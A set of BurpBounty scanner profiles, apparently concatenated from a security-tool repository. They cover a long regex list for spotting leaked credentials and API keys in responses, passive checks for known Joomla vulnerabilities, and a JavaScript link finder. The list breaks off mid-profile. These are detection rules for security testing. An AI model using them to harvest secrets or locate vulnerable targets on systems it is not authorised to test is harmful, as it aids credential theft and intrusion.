"true,Or,db[_-]pw",
"true,Or,db[_-]user",
"true,Or,db[_-]username",
"true,Or,ddg[_-]test[_-]email",
"true,Or,ddg[_-]test[_-]email[_-]pw",
"true,Or,ddgc[_-]github[_-]token",
"true,Or,deploy[_-]password",
"true,Or,deploy[_-]secure",
"true,Or,deploy[_-]token",
"true,Or,deploy[_-]user",
"true,Or,dgpg[_-]passphrase",
"true,Or,digitalocean[_-]access[_-]token",
"true,Or,digitalocean[_-]ssh[_-]key[_-]body",
"true,Or,digitalocean[_-]ssh[_-]key[_-]ids",
"true,Or,docker[_-]hub[_-]password",
"true,Or,docker[_-]key",
"true,Or,docker[_-]pass",
"true,Or,docker[_-]passwd",
"true,Or,docker[_-]password",
"true,Or,docker[_-]postgres[_-]url",
"true,Or,docker[_-]token",
"true,Or,dockerhub[_-]password",
"true,Or,dockerhubpassword",
"true,Or,doordash[_-]auth[_-]token",
"true,Or,dropbox[_-]oauth[_-]bearer",
"true,Or,droplet[_-]travis[_-]password",
"true,Or,dsonar[_-]login",
"true,Or,dsonar[_-]projectkey",
"true,Or,elastic[_-]cloud[_-]auth",
"true,Or,elasticsearch[_-]password",
"true,Or,encryption[_-]password",
"true,Or,end[_-]user[_-]password",
"true,Or,env[_-]github[_-]oauth[_-]token",
"true,Or,env[_-]heroku[_-]api[_-]key",
"true,Or,env[_-]key",
"true,Or,env[_-]secret",
"true,Or,env[_-]secret[_-]access[_-]key",
"true,Or,env[_-]sonatype[_-]password",
"true,Or,eureka[_-]awssecretkey",
"true,Or,exp[_-]password",
"true,Or,file[_-]password",
"true,Or,firebase[_-]api[_-]json",
"true,Or,firebase[_-]api[_-]token",
"true,Or,firebase[_-]key",
"true,Or,firebase[_-]project[_-]develop",
"true,Or,firebase[_-]token",
"true,Or,firefox[_-]secret",
"true,Or,flask[_-]secret[_-]key",
"true,Or,flickr[_-]api[_-]key",
"true,Or,flickr[_-]api[_-]secret",
"true,Or,fossa[_-]api[_-]key",
"true,Or,ftp[_-]host",
"true,Or,ftp[_-]login",
"true,Or,ftp[_-]password",
"true,Or,ftp[_-]pw",
"true,Or,ftp[_-]user",
"true,Or,ftp[_-]username",
"true,Or,gcloud[_-]bucket",
"true,Or,gcloud[_-]project",
"true,Or,gcloud[_-]service[_-]key",
"true,Or,gcr[_-]password",
"true,Or,gcs[_-]bucket",
"true,Or,gh[_-]api[_-]key",
"true,Or,gh[_-]email",
"true,Or,gh[_-]next[_-]oauth[_-]client[_-]secret",
"true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]id",
"true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]secret",
"true,Or,gh[_-]oauth[_-]client[_-]secret",
"true,Or,gh[_-]oauth[_-]token",
"true,Or,gh[_-]repo[_-]token",
"true,Or,gh[_-]token",
"true,Or,gh[_-]unstable[_-]oauth[_-]client[_-]secret",
"true,Or,ghb[_-]token",
"true,Or,ghost[_-]api[_-]key",
"true,Or,git[_-]author[_-]email",
"true,Or,git[_-]author[_-]name",
"true,Or,git[_-]committer[_-]email",
"true,Or,git[_-]committer[_-]name",
"true,Or,git[_-]email",
"true,Or,git[_-]name",
"true,Or,git[_-]token",
"true,Or,github[_-]access[_-]token",
"true,Or,github[_-]api[_-]key",
"true,Or,github[_-]api[_-]token",
"true,Or,github[_-]auth",
"true,Or,github[_-]auth[_-]token",
"true,Or,github[_-]client[_-]secret",
"true,Or,github[_-]deploy[_-]hb[_-]doc[_-]pass",
"true,Or,github[_-]deployment[_-]token",
"true,Or,github[_-]hunter[_-]token",
"true,Or,github[_-]hunter[_-]username",
"true,Or,github[_-]oauth",
"true,Or,github[_-]oauth[_-]token",
"true,Or,github[_-]password",
"true,Or,github[_-]pwd",
"true,Or,github[_-]release[_-]token",
"true,Or,github[_-]repo",
"true,Or,github[_-]token",
"true,Or,github[_-]tokens",
"true,Or,gitlab[_-]user[_-]email",
"true,Or,gogs[_-]password",
"true,Or,google[_-]account[_-]type",
"true,Or,google[_-]client[_-]email",
"true,Or,google[_-]client[_-]id",
"true,Or,google[_-]client[_-]secret",
"true,Or,google[_-]maps[_-]api[_-]key",
"true,Or,google[_-]private[_-]key",
"true,Or,gpg[_-]key[_-]name",
"true,Or,gpg[_-]keyname",
"true,Or,gpg[_-]ownertrust",
"true,Or,gpg[_-]passphrase",
"true,Or,gpg[_-]private[_-]key",
"true,Or,gpg[_-]secret[_-]keys",
"true,Or,gradle[_-]publish[_-]key",
"true,Or,gradle[_-]publish[_-]secret",
"true,Or,gradle[_-]signing[_-]key[_-]id",
"true,Or,gradle[_-]signing[_-]password",
"true,Or,gren[_-]github[_-]token",
"true,Or,grgit[_-]user",
"true,Or,hab[_-]auth[_-]token",
"true,Or,hab[_-]key",
"true,Or,hb[_-]codesign[_-]gpg[_-]pass",
"true,Or,hb[_-]codesign[_-]key[_-]pass",
"true,Or,heroku[_-]api[_-]key",
"true,Or,heroku[_-]email",
"true,Or,heroku[_-]token",
"true,Or,hockeyapp[_-]token",
"true,Or,homebrew[_-]github[_-]api[_-]token",
"true,Or,hub[_-]dxia2[_-]password",
"true,Or,ij[_-]repo[_-]password",
"true,Or,ij[_-]repo[_-]username",
"true,Or,index[_-]name",
"true,Or,integration[_-]test[_-]api[_-]key",
"true,Or,integration[_-]test[_-]appid",
"true,Or,internal[_-]secrets",
"true,Or,ios[_-]docs[_-]deploy[_-]token",
"true,Or,itest[_-]gh[_-]token",
"true,Or,jdbc[_-]databaseurl",
"true,Or,jdbc[_-]host",
"true,Or,jwt[_-]secret",
"true,Or,kafka[_-]admin[_-]url",
"true,Or,kafka[_-]instance[_-]name",
"true,Or,kafka[_-]rest[_-]url",
"true,Or,keystore[_-]pass",
"true,Or,kovan[_-]private[_-]key",
"true,Or,kubecfg[_-]s3[_-]path",
"true,Or,kxoltsn3vogdop92m",
"true,Or,leanplum[_-]key",
"true,Or,lektor[_-]deploy[_-]password",
"true,Or,lektor[_-]deploy[_-]username",
"true,Or,lighthouse[_-]api[_-]key",
"true,Or,linkedin[_-]client[_-]secretor lottie[_-]s3[_-]api[_-]key",
"true,Or,linux[_-]signing[_-]key",
"true,Or,ll[_-]publish[_-]url",
"true,Or,ll[_-]shared[_-]key",
"true,Or,looker[_-]test[_-]runner[_-]client[_-]secret",
"true,Or,lottie[_-]happo[_-]api[_-]key",
"true,Or,lottie[_-]happo[_-]secret[_-]key",
"true,Or,lottie[_-]s3[_-]secret[_-]key",
"true,Or,lottie[_-]upload[_-]cert[_-]key[_-]password",
"true,Or,lottie[_-]upload[_-]cert[_-]key[_-]store[_-]password",
"true,Or,magento[_-]auth[_-]password",
"true,Or,magento[_-]auth[_-]username ",
"true,Or,magento[_-]password",
"true,Or,mail[_-]password",
"true,Or,mailchimp[_-]api[_-]key",
"true,Or,mailchimp[_-]key",
"true,Or,mailer[_-]password",
"true,Or,mailgun[_-]api[_-]key",
"true,Or,mailgun[_-]apikey",
"true,Or,mailgun[_-]password",
"true,Or,mailgun[_-]priv[_-]key",
"true,Or,mailgun[_-]pub[_-]apikey",
"true,Or,mailgun[_-]pub[_-]key",
"true,Or,mailgun[_-]secret[_-]api[_-]key",
"true,Or,manage[_-]key",
"true,Or,manage[_-]secret",
"true,Or,management[_-]token",
"true,Or,managementapiaccesstoken",
"true,Or,mandrill[_-]api[_-]key",
"true,Or,manifest[_-]app[_-]token",
"true,Or,manifest[_-]app[_-]url",
"true,Or,mapbox[_-]access[_-]token",
"true,Or,mapbox[_-]api[_-]token",
"true,Or,mapbox[_-]aws[_-]access[_-]key[_-]id",
"true,Or,mapbox[_-]aws[_-]secret[_-]access[_-]key",
"true,Or,mapboxaccesstoken",
"true,Or,mg[_-]api[_-]key",
"true,Or,mg[_-]public[_-]api[_-]key",
"true,Or,mh[_-]apikey",
"true,Or,mh[_-]password",
"true,Or,mile[_-]zero[_-]key",
"true,Or,minio[_-]access[_-]key",
"true,Or,minio[_-]secret[_-]key",
"true,Or,multi[_-]bob[_-]sid",
"true,Or,multi[_-]connect[_-]sid",
"true,Or,multi[_-]disconnect[_-]sid",
"true,Or,multi[_-]workflow[_-]sid",
"true,Or,multi[_-]workspace[_-]sid",
"true,Or,my[_-]secret[_-]env",
"true,Or,mysql[_-]database",
"true,Or,mysql[_-]hostname",
"true,Or,mysql[_-]password",
"true,Or,mysql[_-]root[_-]password",
"true,Or,mysql[_-]user",
"true,Or,mysql[_-]username",
"true,Or,mysqlmasteruser",
"true,Or,mysqlsecret",
"true,Or,netlify[_-]api[_-]key",
"true,Or,new[_-]relic[_-]beta[_-]token",
"true,Or,nexus[_-]password",
"true,Or,nexuspassword",
"true,Or,ngrok[_-]auth[_-]token",
"true,Or,ngrok[_-]token",
"true,Or,node[_-]env",
"true,Or,node[_-]pre[_-]gyp[_-]accesskeyid",
"true,Or,node[_-]pre[_-]gyp[_-]github[_-]token",
"true,Or,node[_-]pre[_-]gyp[_-]secretaccesskey",
"true,Or,non[_-]token",
"true,Or,now[_-]token",
"true,Or,npm[_-]api[_-]key",
"true,Or,npm[_-]api[_-]token",
"true,Or,npm[_-]auth[_-]token",
"true,Or,npm[_-]email",
"true,Or,npm[_-]password",
"true,Or,npm[_-]secret[_-]key",
"true,Or,npm[_-]token",
"true,Or,nuget[_-]api[_-]key",
"true,Or,nuget[_-]apikey",
"true,Or,nuget[_-]key",
"true,Or,numbers[_-]service[_-]pass",
"true,Or,oauth[_-]token",
"true,Or,object[_-]storage[_-]password",
"true,Or,object[_-]storage[_-]region[_-]name",
"true,Or,object[_-]store[_-]bucket",
"true,Or,object[_-]store[_-]creds",
"true,Or,oc[_-]pass",
"true,Or,octest[_-]app[_-]password",
"true,Or,octest[_-]app[_-]username",
"true,Or,octest[_-]password",
"true,Or,ofta[_-]key",
"true,Or,ofta[_-]region",
"true,Or,ofta[_-]secret",
"true,Or,okta[_-]client[_-]token",
"true,Or,okta[_-]oauth2[_-]client[_-]secret",
"true,Or,okta[_-]oauth2[_-]clientsecret",
"true,Or,omise[_-]key",
"true,Or,omise[_-]pkey",
"true,Or,omise[_-]pubkey",
"true,Or,omise[_-]skey",
"true,Or,onesignal[_-]api[_-]key",
"true,Or,onesignal[_-]user[_-]auth[_-]key",
"true,Or,open[_-]whisk[_-]key",
"true,Or,openwhisk[_-]key",
"true,Or,org[_-]gradle[_-]project[_-]sonatype[_-]nexus[_-]password",
"true,Or,org[_-]project[_-]gradle[_-]sonatype[_-]nexus[_-]password",
"true,Or,os[_-]auth[_-]url",
"true,Or,os[_-]password",
"true,Or,ossrh[_-]jira[_-]password",
"true,Or,ossrh[_-]pass",
"true,Or,ossrh[_-]password",
"true,Or,ossrh[_-]secret",
"true,Or,ossrh[_-]username",
"true,Or,packagecloud[_-]token",
"true,Or,pagerduty[_-]apikey",
"true,Or,parse[_-]js[_-]key",
"true,Or,passwordtravis",
"true,Or,paypal[_-]client[_-]secret",
"true,Or,percy[_-]project",
"true,Or,percy[_-]token",
"true,Or,personal[_-]key",
"true,Or,personal[_-]secret",
"true,Or,pg[_-]database",
"true,Or,pg[_-]host",
"true,Or,places[_-]api[_-]key",
"true,Or,places[_-]apikey",
"true,Or,plotly[_-]apikey",
"true,Or,plugin[_-]password",
"true,Or,postgres[_-]env[_-]postgres[_-]db",
"true,Or,postgres[_-]env[_-]postgres[_-]password",
"true,Or,postgresql[_-]db",
"true,Or,postgresql[_-]pass",
"true,Or,prebuild[_-]auth",
"true,Or,preferred[_-]username",
"true,Or,pring[_-]mail[_-]username",
"true,Or,private[_-]signing[_-]password",
"true,Or,prod[_-]access[_-]key[_-]id",
"true,Or,prod[_-]password",
"true,Or,prod[_-]secret[_-]key",
"true,Or,project[_-]config",
"true,Or,publish[_-]access",
"true,Or,publish[_-]key",
"true,Or,publish[_-]secret",
"true,Or,pushover[_-]token",
"true,Or,pypi[_-]passowrd",
"true,Or,qiita[_-]token",
"true,Or,quip[_-]token",
"true,Or,rabbitmq[_-]password",
"true,Or,randrmusicapiaccesstoken",
"true,Or,redis[_-]stunnel[_-]urls",
"true,Or,rediscloud[_-]url",
"true,Or,refresh[_-]token",
"true,Or,registry[_-]pass",
"true,Or,registry[_-]secure",
"true,Or,release[_-]gh[_-]token",
"true,Or,release[_-]token",
"true,Or,reporting[_-]webdav[_-]pwd",
"true,Or,reporting[_-]webdav[_-]url",
"true,Or,repotoken",
"true,Or,rest[_-]api[_-]key",
"true,Or,rinkeby[_-]private[_-]key",
"true,Or,ropsten[_-]private[_-]key",
"true,Or,route53[_-]access[_-]key[_-]id",
"true,Or,rtd[_-]key[_-]pass",
"true,Or,rtd[_-]store[_-]pass",
"true,Or,rubygems[_-]auth[_-]token",
"true,Or,s3[_-]access[_-]key",
"true,Or,s3[_-]access[_-]key[_-]id",
"true,Or,s3[_-]bucket[_-]name[_-]app[_-]logs",
"true,Or,s3[_-]bucket[_-]name[_-]assets",
"true,Or,s3[_-]external[_-]3[_-]amazonaws[_-]com",
"true,Or,s3[_-]key",
"true,Or,s3[_-]key[_-]app[_-]logs",
"true,Or,s3[_-]key[_-]assets",
"true,Or,s3[_-]secret[_-]app[_-]logs",
"true,Or,s3[_-]secret[_-]assets",
"true,Or,s3[_-]secret[_-]key",
"true,Or,s3[_-]user[_-]secret",
"true,Or,sacloud[_-]access[_-]token",
"true,Or,sacloud[_-]access[_-]token[_-]secret",
"true,Or,sacloud[_-]api",
"true,Or,salesforce[_-]bulk[_-]test[_-]password",
"true,Or,salesforce[_-]bulk[_-]test[_-]security[_-]token",
"true,Or,sandbox[_-]access[_-]token",
"true,Or,sandbox[_-]aws[_-]access[_-]key[_-]id",
"true,Or,sandbox[_-]aws[_-]secret[_-]access[_-]key",
"true,Or,sauce[_-]access[_-]key",
"true,Or,scrutinizer[_-]token",
"true,Or,sdr[_-]token",
"true,Or,secret[_-]0",
"true,Or,secret[_-]1",
"true,Or,secret[_-]10",
"true,Or,secret[_-]11",
"true,Or,secret[_-]2",
"true,Or,secret[_-]3",
"true,Or,secret[_-]4",
"true,Or,secret[_-]5",
"true,Or,secret[_-]6",
"true,Or,secret[_-]7",
"true,Or,secret[_-]8",
"true,Or,secret[_-]9",
"true,Or,secret[_-]key[_-]base",
"true,Or,segment[_-]api[_-]key",
"true,Or,selion[_-]log[_-]level[_-]dev",
"true,Or,selion[_-]selenium[_-]host",
"true,Or,sendgrid[_-]api[_-]key",
"true,Or,sendgrid[_-]key",
"true,Or,sendgrid[_-]password",
"true,Or,sendgrid[_-]user",
"true,Or,sendgrid[_-]username",
"true,Or,sendwithus[_-]key",
"true,Or,sentry[_-]auth[_-]token",
"true,Or,sentry[_-]default[_-]org",
"true,Or,sentry[_-]endpoint",
"true,Or,sentry[_-]key",
"true,Or,service[_-]account[_-]secret",
"true,Or,ses[_-]access[_-]key",
"true,Or,ses[_-]secret[_-]key",
"true,Or,signing[_-]key",
"true,Or,signing[_-]key[_-]password",
"true,Or,signing[_-]key[_-]secret",
"true,Or,signing[_-]key[_-]sid",
"true,Or,slash[_-]developer[_-]space",
"true,Or,slash[_-]developer[_-]space[_-]key",
"true,Or,slate[_-]user[_-]email",
"true,Or,snoowrap[_-]client[_-]secret",
"true,Or,snoowrap[_-]password",
"true,Or,snoowrap[_-]refresh[_-]token",
"true,Or,snyk[_-]api[_-]token",
"true,Or,snyk[_-]token",
"true,Or,socrata[_-]app[_-]token",
"true,Or,socrata[_-]password",
"true,Or,sonar[_-]organization[_-]key",
"true,Or,sonar[_-]project[_-]key",
"true,Or,sonar[_-]token",
"true,Or,sonatype[_-]gpg[_-]key[_-]name",
"true,Or,sonatype[_-]gpg[_-]passphrase",
"true,Or,sonatype[_-]nexus[_-]password",
"true,Or,sonatype[_-]pass",
"true,Or,sonatype[_-]password",
"true,Or,sonatype[_-]token[_-]password",
"true,Or,sonatype[_-]token[_-]user",
"true,Or,sonatypepassword",
"true,Or,soundcloud[_-]client[_-]secret",
"true,Or,soundcloud[_-]password",
"true,Or,spaces[_-]access[_-]key[_-]id",
"true,Or,spaces[_-]secret[_-]access[_-]key",
"true,Or,spotify[_-]api[_-]access[_-]token",
"true,Or,spotify[_-]api[_-]client[_-]secret",
"true,Or,spring[_-]mail[_-]password",
"true,Or,sqsaccesskey",
"true,Or,sqssecretkey",
"true,Or,square[_-]reader[_-]sdk[_-]repository[_-]password",
"true,Or,srcclr[_-]api[_-]token",
"true,Or,ssmtp[_-]config",
"true,Or,staging[_-]base[_-]url[_-]runscope",
"true,Or,star[_-]test[_-]aws[_-]access[_-]key[_-]id",
"true,Or,star[_-]test[_-]bucket",
"true,Or,star[_-]test[_-]location",
"true,Or,star[_-]test[_-]secret[_-]access[_-]key",
"true,Or,starship[_-]account[_-]sid",
"true,Or,starship[_-]auth[_-]token",
"true,Or,stormpath[_-]api[_-]key[_-]id",
"true,Or,stormpath[_-]api[_-]key[_-]secret",
"true,Or,strip[_-]publishable[_-]key",
"true,Or,strip[_-]secret[_-]key",
"true,Or,stripe[_-]private",
"true,Or,stripe[_-]public",
"true,Or,surge[_-]login",
"true,Or,surge[_-]token",
"true,Or,svn[_-]pass",
"true,Or,tesco[_-]api[_-]key",
"true,Or,test[_-]github[_-]token",
"true,Or,test[_-]test",
"true,Or,tester[_-]keys[_-]password",
"true,Or,thera[_-]oss[_-]access[_-]key",
"true,Or,token[_-]core[_-]java",
"true,Or,travis[_-]access[_-]token",
"true,Or,travis[_-]api[_-]token",
"true,Or,travis[_-]branch",
"true,Or,travis[_-]com[_-]token",
"true,Or,travis[_-]e2e[_-]token",
"true,Or,travis[_-]gh[_-]token",
"true,Or,travis[_-]pull[_-]request",
"true,Or,travis[_-]secure[_-]env[_-]vars",
"true,Or,travis[_-]token",
"true,Or,trex[_-]client[_-]token",
"true,Or,trex[_-]okta[_-]client[_-]token",
"true,Or,twilio[_-]api[_-]key",
"true,Or,twilio[_-]api[_-]secret",
"true,Or,twilio[_-]chat[_-]account[_-]api[_-]service",
"true,Or,twilio[_-]configuration[_-]sid",
"true,Or,twilio[_-]sid",
"true,Or,twilio[_-]token",
"true,Or,twine[_-]password",
"true,Or,twitter[_-]consumer[_-]key",
"true,Or,twitter[_-]consumer[_-]secret",
"true,Or,twitteroauthaccesssecret",
"true,Or,twitteroauthaccesstoken",
"true,Or,unity[_-]password",
"true,Or,unity[_-]serial",
"true,Or,urban[_-]key",
"true,Or,urban[_-]master[_-]secret",
"true,Or,urban[_-]secret",
"true,Or,us[_-]east[_-]1[_-]elb[_-]amazonaws[_-]com",
"true,Or,use[_-]ssh",
"true,Or,user[_-]assets[_-]access[_-]key[_-]id",
"true,Or,user[_-]assets[_-]secret[_-]access[_-]key",
"true,Or,v[_-]sfdc[_-]client[_-]secret",
"true,Or,v[_-]sfdc[_-]password",
"true,Or,vip[_-]github[_-]build[_-]repo[_-]deploy[_-]key",
"true,Or,vip[_-]github[_-]deploy[_-]key",
"true,Or,vip[_-]github[_-]deploy[_-]key[_-]pass",
"true,Or,virustotal[_-]apikey",
"true,Or,visual[_-]recognition[_-]api[_-]key",
"true,Or,wakatime[_-]api[_-]key",
"true,Or,watson[_-]conversation[_-]password",
"true,Or,watson[_-]device[_-]password",
"true,Or,watson[_-]password",
"true,Or,widget[_-]basic[_-]password",
"true,Or,widget[_-]basic[_-]password[_-]2",
"true,Or,widget[_-]basic[_-]password[_-]3",
"true,Or,widget[_-]basic[_-]password[_-]4",
"true,Or,widget[_-]basic[_-]password[_-]5",
"true,Or,widget[_-]fb[_-]password",
"true,Or,widget[_-]fb[_-]password[_-]2",
"true,Or,widget[_-]fb[_-]password[_-]3",
"true,Or,widget[_-]test[_-]server",
"true,Or,wincert[_-]password",
"true,Or,wordpress[_-]db[_-]password",
"true,Or,wordpress[_-]db[_-]user",
"true,Or,wpjm[_-]phpunit[_-]google[_-]geocode[_-]api[_-]key",
"true,Or,wporg[_-]password",
"true,Or,wpt[_-]db[_-]password",
"true,Or,wpt[_-]db[_-]user",
"true,Or,wpt[_-]prepare[_-]dir",
"true,Or,wpt[_-]report[_-]api[_-]key",
"true,Or,wpt[_-]ssh[_-]connect",
"true,Or,wpt[_-]ssh[_-]private[_-]key[_-]base64",
"true,Or,www[_-]googleapis[_-]com",
"true,Or,yangshun[_-]gh[_-]password",
"true,Or,yangshun[_-]gh[_-]token",
"true,Or,yt[_-]account[_-]client[_-]secret",
"true,Or,yt[_-]account[_-]refresh[_-]token",
"true,Or,yt[_-]api[_-]key",
"true,Or,yt[_-]client[_-]secret",
"true,Or,yt[_-]partner[_-]client[_-]secret",
"true,Or,yt[_-]partner[_-]refresh[_-]token",
"true,Or,yt[_-]server[_-]api[_-]key",
"true,Or,zendesk[_-]travis[_-]github",
"true,Or,zensonatypepassword",
"true,Or,zhuliang[_-]gh[_-]token",
"true,Or,zopim[_-]account[_-]key"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Interesting Keywords",
"IssueSeverity": "Information",
"IssueConfidence": "Tentative",
"IssueDetail": "Interesting Keywords detected. Needs manual revision, it could means nothing",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Joomla-ArbitraryFileUpload.bb | [
{
"ProfileName": "Joomla-ArbitraryFileUpload",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Value,index.php?option\u003dcom_joomanager"
],
"Tags": [
"CMS",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Joomla-ArbitraryFileUpload",
"IssueSeverity": "High",
"IssueConfidence": "Firm",
"IssueDetail": "Joomla Arbitrary File Upload:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4687/",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Joomla-CVE-2015-7297.bb | [
{
"ProfileName": "Joomla-CVE-2015-7297",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,powered by joomla 3.2",
"true,Or,powered by joomla 3.3",
"true,Or,powered by joomla 3.4"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Joomla-SQLi",
"IssueSeverity": "High",
"IssueConfidence": "Firm",
"IssueDetail": "Joomla SQLi - CVE-2015-7297: \u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4110/",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Joomla-ReflectedXSS.bb | [
{
"ProfileName": "Joomla-ReflectedXSS",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Value,sendmessage.php?type\u003dskype"
],
"Tags": [
"XSS",
"CMS",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Joomla-ReflectedXSS",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Joomla-ReflectedXSS:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4398/",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/JoomlaSQLi-com_artforms.bb | [
{
"ProfileName": "JoomlaSQLi-com_artforms",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Value,index.php?option\u003dcom_artforms"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "JoomlaSQLi",
"IssueSeverity": "High",
"IssueConfidence": "Firm",
"IssueDetail": "Joomla \"com_artforms\" component SQL Injection:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4386/",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/JS_LinkFinder.bb | [
{
"ProfileName": "JS_LinkFinder",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?:\"|\u0027)(((?:[a-zA-Z]{1,10}://|//)[^\"\u0027/]{1,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|^\u0027]{0,}|)))(?:\"|\u0027)"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "application/javascript",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "JS LinkFinder",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/JWT-Request.bb | [
{
"ProfileName": "JWT-Request",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@Sy3Omda",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
